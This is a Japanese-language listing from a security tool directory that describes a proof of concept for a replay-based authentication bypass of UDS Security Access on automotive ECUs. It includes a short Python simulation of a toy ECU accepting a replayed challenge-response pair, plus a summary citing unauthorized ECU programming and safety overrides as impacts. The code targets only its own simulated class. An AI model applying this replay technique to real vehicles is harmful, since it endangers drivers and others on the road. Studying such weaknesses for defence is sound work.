Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack — 自動車用ECU上のチャレンジレスポンスリプレイによるUDS認証バイパスを実証する概念実証エクスプロイト(Python CAN-UDSシミュレータ付き)。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack
認証と認可組み込みシステムセキュリティIoTセキュリティ脆弱性分析エクスプロイトペネトレーションテストハードウェアとIoTセキュリティ
GitHubgeorge0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack

自動車用ECU上のチャレンジレスポンスリプレイによるUDS認証バイパスを実証する概念実証エクスプロイト(Python CAN-UDSシミュレータ付き)。

リポジトリを見る
115日前未レビュー

CVE-2026-23004 – 自動車UDS認証バイパス(リプレイ攻撃)

プログラムコード(Python CAN‑UDSシミュレータ)

root@kitploit:~
# uds_sim.py - ECU that authenticates with a simple challenge
import random, hashlib

class ECU:
    def __init__(self):
        self.secret = b'long_secret_key'
    def generate_challenge(self):
        self.challenge = random.randbytes(8)
        return self.challenge
    def verify_response(self, response):
        expected = hashlib.sha256(self.secret + self.challenge).digest()[:8]
        return response == expected
    def unlock(self):
        print("ECU unlocked! Critical functions accessible.")

# Attacker captures a valid challenge-response pair
ecu = ECU()
challenge = ecu.generate_challenge()
# Legitimate tool computes response (simplified)
response = hashlib.sha256(ecu.secret + challenge).digest()[:8]
ecu.verify_response(response)  # first unlock

# Replay the same challenge-response
ecu.challenge = challenge
ecu.verify_response(response)  # second unlock without new challenge - works
ecu.unlock()

CVE-2026-23004 – リプレイによる自動車UDS認証バイパス

Severity: High

概要

自動車用ECUは、統一診断サービス(UDS)のセキュリティアクセス(サービス0x27)を実装していますが、ワンタイムチャレンジの使用を強制していません。攻撃者は有効なチャレンジ‑レスポンスのペアをキャプチャし、それをリプレイすることで認証をバイパスできます。

脆弱性の詳細

  • タイプ: リプレイ攻撃
  • 影響: 不正なECUプログラミング、セーフティオーバーライド。
  • 根本原因: ECUは現在のチャレンジに一致するレスポンスを受け入れますが、同じチャレンジを無効化せずに再利用できます。

エクスプロイトのデモ

シミュレーションを実行します:

root@kitploit:~
python uds_sim.py

ECUは同じ認証ペアで2回ロック解除されます。

ツールをダウンロード